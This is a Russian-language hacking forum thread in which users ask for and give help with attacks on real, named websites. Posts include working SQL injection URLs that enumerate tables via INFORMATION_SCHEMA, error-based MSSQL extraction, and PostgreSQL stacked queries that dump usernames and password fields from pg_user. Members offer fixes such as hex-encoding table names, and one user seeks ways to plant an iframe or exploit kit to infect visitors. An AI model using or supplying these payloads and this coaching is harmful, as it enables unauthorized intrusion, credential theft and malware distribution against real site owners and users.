Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Flame of Soul

    Flame of Soul Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    185
    Likes Received:
    146
    Reputations:
    45
    пришли куки
    PHPSESSID=1njbt3ksf71o1118ibr5shi7t2
    скажите даст ли чтонибудь их расшифровка?
     
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    это не кукисы, это сессия, не расшифруешь, т.к. рандомно генерится
     
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    попробуй проделать вышеописанные тобой действия с помощью sqltool и дальше TableName и FieldName Bruteforce​
     
    1 person likes this.
  4. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Меня всегда интересовал ворпос
    а безопастно ли вот так проверять:
    if($_SESSION['valid_user'])
    {
    // бла бла бла
    }

    и можно ли как-нить подменить эту переменную в сесии?

    и как вообще правильно писать такую верификацию?
     
  5. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    в принципе не возможно.. только в случае тупоумности программистом, если они сешн через экстракт прогоняют.. тогда в теории можно.. но лично не встречал
     
  6. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Помогите подобрать поля
    http://www.logika.kz/index.php?p=news&order=&st=6
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 truelamer
    Имхо инъекция в лимите ,да ещё после ORDER так-что врятли
     
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*

    выдало таблицу: moderator

    Почему вот этот не проходит:
    http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*
     
  9. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    table_name='moderator' или в hex
     
  10. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Спасибо! +1
     
  11. LAEOT

    LAEOT Member

    Joined:
    6 Jan 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    У меня такой вопрос:
    База даных : Mssql.
    Я пробывать зделать по этой стате :
    http://forum.antichat.ru/thread30501-mssql.html

    Первый этап прошол:
    www.*****.com/?id=1'

    Microsoft OLE DB Provider for SQL Server error '80040e14'

    Line 1: Incorrect syntax near 'application'.

    /index.asp, line 89

    второй :
    www.*****.com/?id=1'%20or%201=(select%20db_name())--

    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Syntax error converting the nvarchar value 'player' to a column of data type int.

    /index.asp, line 89

    третий:
    www.****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Syntax error converting the nvarchar value 'points' to a column of data type int.

    /index.asp, line 89

    четвёртый:
    www.*****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('points'))--

    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Syntax error converting the nvarchar value 'points' to a column of data type int.

    /index.asp, line 89

    Пятый:

    И тут я застрял,надо:
    id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1','table2',........,'table50'))--

    Что то у меня не получилось и я получил:

    Microsoft OLE DB Provider for SQL Server error '80040e14'

    Line 1: Incorrect syntax near 'table1'.

    /index.asp, line 89

    Что мне дальше делать,или где моя ошибка?

    Огромное спасибо!
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вы ,что господа сговорились? Посмотри на пост выше ,скорее всего та-же проблема.
    Т.е. Hex
     
  13. Zergius

    Zergius New Member

    Joined:
    4 Dec 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).Что нужно для взлома (эксплоит, или еще что то)?
    Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?
     
  14. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    ВОпрост такое вообще взламывается?

    Server Error in '/' Application.
    Input string was not in a correct format.
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

    Exception Details: System.FormatException: Input string was not in a correct format.

    Source Error:
    An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


    Stack Trace:

    [FormatException: Input string was not in a correct format.]
    System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
    System.Convert.ToInt32(String value) +47
    ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:38
    System.Web.UI.Control.OnLoad(EventArgs e) +67
    System.Web.UI.Control.LoadRecursive() +35
    System.Web.UI.Control.LoadRecursive() +98
    System.Web.UI.Control.LoadRecursive() +98
    System.Web.UI.Control.LoadRecursive() +98
    System.Web.UI.Page.ProcessRequestMain() +750


    Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
     
  15. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    народ подскажите неучу.
    вот есть у меня скуль инекция как мне на индех.пхп повесить ифрейм или там сплойтег или че нить такое карочь изменить?
    да я тут просто решил затроянить инет :D :D :D не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю
    не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ
     
    #1155 satana8920, 9 Mar 2008
    Last edited: 9 Mar 2008
  16. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную

    Ну если ты нашёл, то ты и должен знать что это за уязвимость и как её использовать.
    Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?[/QUOTE]
    Опять же, если нашёл, то должен знать как использовать.
    http://injection.rulezz.ru/
     
    _________________________
    #1156 +toxa+, 9 Mar 2008
    Last edited: 9 Mar 2008
    2 people like this.
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Иди лучше книжку почитай.
     
    _________________________
  18. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.sports.kz/index.php?st=-1'

    как юзать? что то ничего там не катит толи фильтры толи хз даже пробел затолкать не могу
     
  19. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    2truelamer
    Енто ошибка в скрипте изпользовать можно только как раcкрытие пути !
     
    #1159 MaSter GeN, 10 Mar 2008
    Last edited by a moderator: 10 Mar 2008
  20. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

    PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

    выводит много интересного, но я выбрал pg_user

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

    результат:

    usecatupd
    usesuper
    usecreatedb
    usename
    usesysid
    passwd
    valuntil
    useconfig

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

    http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


    первый это админ
    login: postgres
    pass: ********

    Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....
     
Thread Status:
Not open for further replies.